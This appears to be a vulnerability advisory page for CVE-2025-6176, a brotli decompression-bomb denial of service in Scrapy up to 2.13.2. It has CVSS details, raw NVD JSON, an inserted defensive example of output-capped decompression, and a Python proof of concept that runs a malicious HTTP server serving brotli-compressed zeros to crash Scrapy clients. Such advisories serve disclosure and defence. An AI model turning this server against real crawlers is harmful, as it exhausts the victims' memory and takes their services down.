Security Vulnerability Report
CVE-2025-6176 CVSS 7.5 HIGH

CVE-2025-6176

Published: 2025-10-31 00:15:37
Last Modified: 2026-04-15 00:35:42

Description

Scrapy versions up to 2.13.2 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression.
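The description above turns on where a decompression-bomb limit is measured: a few kilobytes on the wire can expand to tens of gigabytes, so a guard has to bound the bytes a decoder produces, not the bytes it receives. The following is an added example, not code from this page, the advisory, or the Scrapy project. It shows that guard shape with the standard library's zlib (the Python brotli bindings are not part of the standard library); a brotli decoding path needs the same output-bounded stepping. The names (`bounded_decompress`, `classify`, `CHUNK`), the size budget, and the 10 MB zero-filled sample body are all constructed for this illustration.

```python
import zlib

# Bytes of decompressed output requested per step. We never ask the decoder
# for more than the remaining budget, so a bomb is cut off before it is built.
CHUNK = 64 * 1024


class DecompressionBombError(ValueError):
    """Raised when a stream would expand past the caller's size budget."""


class TruncatedStreamError(ValueError):
    """Raised when the input ends before the compressed stream is complete."""


def compress_body(plain: bytes) -> bytes:
    """Helper for building sample bodies (constructed inputs, not real traffic)."""
    return zlib.compress(plain, 9)


def make_zero_bomb(plain_size: int = 10_000_000) -> bytes:
    """Constructed sample: zero-filled data, the case named in the advisory."""
    return compress_body(b"\x00" * plain_size)


def passes_wire_size_check(compressed: bytes, max_size: int) -> bool:
    """Illustrative weak guard that looks only at bytes on the wire.

    A bomb is tiny on the wire, so this check lets it through. It is here to
    contrast with bounded_decompress, not as a reproduction of any project's code.
    """
    return len(compressed) <= max_size


def bounded_decompress(compressed: bytes, max_size: int) -> bytes:
    """Inflate a zlib stream, aborting before more than max_size bytes exist.

    The decoder is driven with an output cap (max_length), so even a few hundred
    bytes of input can never materialise more than max_size + 1 bytes. Input the
    decoder did not get to is picked up from unconsumed_tail on the next step.
    """
    d = zlib.decompressobj()
    out = bytearray()
    pending = compressed
    while not d.eof:
        budget = max_size - len(out) + 1  # one byte past the cap proves the overrun
        chunk = d.decompress(pending, min(CHUNK, budget))
        out += chunk
        if len(out) > max_size:
            raise DecompressionBombError(
                f"stream expands past {max_size} bytes "
                f"({len(compressed)} bytes on the wire)"
            )
        pending = d.unconsumed_tail
        if not chunk and not d.eof:
            # No output and no end-of-stream marker: the input ran out mid-stream.
            raise TruncatedStreamError("compressed stream ended early")
    return bytes(out)


def classify(compressed: bytes, max_size: int) -> str:
    """Return 'ok', 'bomb', 'truncated' or 'corrupt' for a response body."""
    try:
        bounded_decompress(compressed, max_size)
    except DecompressionBombError:
        return "bomb"
    except TruncatedStreamError:
        return "truncated"
    except zlib.error:
        return "corrupt"
    return "ok"


if __name__ == "__main__":
    bomb = make_zero_bomb()
    print(f"bomb: {len(bomb)} bytes on the wire")
    print("wire-size check passes bomb:", passes_wire_size_check(bomb, 1_000_000))
    print("bounded decompression says:", classify(bomb, 1_000_000))
    print("benign body says:", classify(compress_body(b"<html>hi</html>"), 1_000_000))
```

The wire-size check accepts the bomb because its compressed length is a few kilobytes; the bounded decoder rejects it after roughly `max_size` bytes of output and never holds more than that in memory. The important property for any decoder, brotli included, is that the output cap is enforced inside the decompression loop, because checking the size of the input tells you nothing about what it expands to.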

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Scrapy < 2.13.2
Scrapy 2.0.0 - 2.13.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-6176 PoC - Scrapy Brotli Decompression DoS

This PoC demonstrates how a malicious server can cause Scrapy to consume
excessive memory by sending a specially crafted brotli-compressed response.
"""
import http.server
import brotli
import threading


class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    """Handler that serves malicious brotli-compressed content"""

    def do_GET(self):
        # Generate zero-filled data (highly compressible by brotli)
        # A small amount of data expands to huge size during decompression
        original_data = b'\x00' * (50 * 1024 * 1024)  # 50MB of zeros

        # Compress with brotli - achieves extreme compression ratio
        compressed_data = brotli.compress(original_data)

        print(f"[+] Original size: {len(original_data)} bytes")
        print(f"[+] Compressed size: {len(compressed_data)} bytes")
        print(f"[+] Compression ratio: {len(original_data)/len(compressed_data):.1f}:1")

        # Send response with brotli encoding
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Encoding', 'br')
        self.send_header('Content-Length', str(len(compressed_data)))
        self.end_headers()
        self.wfile.write(compressed_data)

    def log_message(self, format, *args):
        pass


def start_malicious_server(port=8888):
    """Start the malicious HTTP server"""
    server = http.server.HTTPServer(('0.0.0.0', port), MaliciousHandler)
    print(f"[+] Malicious server running on port {port}")
    server.serve_forever()


def test_with_scrapy():
    """
    Test case using Scrapy to demonstrate the vulnerability
    Run this in a separate process after starting the malicious server
    """
    import scrapy
    from scrapy.crawler import CrawlerProcess

    class VulnerableSpider(scrapy.Spider):
        name = 'vulnerable_spider'
        start_urls = ['http://localhost:8888/']

        def parse(self, response):
            self.logger.info(f"Received response: {len(response.body)} bytes")

    process = CrawlerProcess()
    process.crawl(VulnerableSpider)
    process.start()


if __name__ == '__main__':
    # Start malicious server in background thread
    server_thread = threading.Thread(target=start_malicious_server, daemon=True)
    server_thread.start()

    print("\n[!] This PoC demonstrates the vulnerability.")
    print("[!] In real attack scenarios, the attacker controls the server")
    print("[!] and tricks Scrapy clients into fetching the malicious content.")
    print("[!] The decompression will consume excessive memory.")

    # Keep server running
    try:
        server_thread.join()
    except KeyboardInterrupt:
        pass

References

https://huntr.com/bounties/2c26a886-5984-47ee-a421-0d5fe1344eb0

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-6176",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T00:15:37.333",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Scrapy versions up to 2.13.2 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://huntr.com/bounties/2c26a886-5984-47ee-a421-0d5fe1344eb0",
        "source": "[email protected]"
      }
    ]
  }
}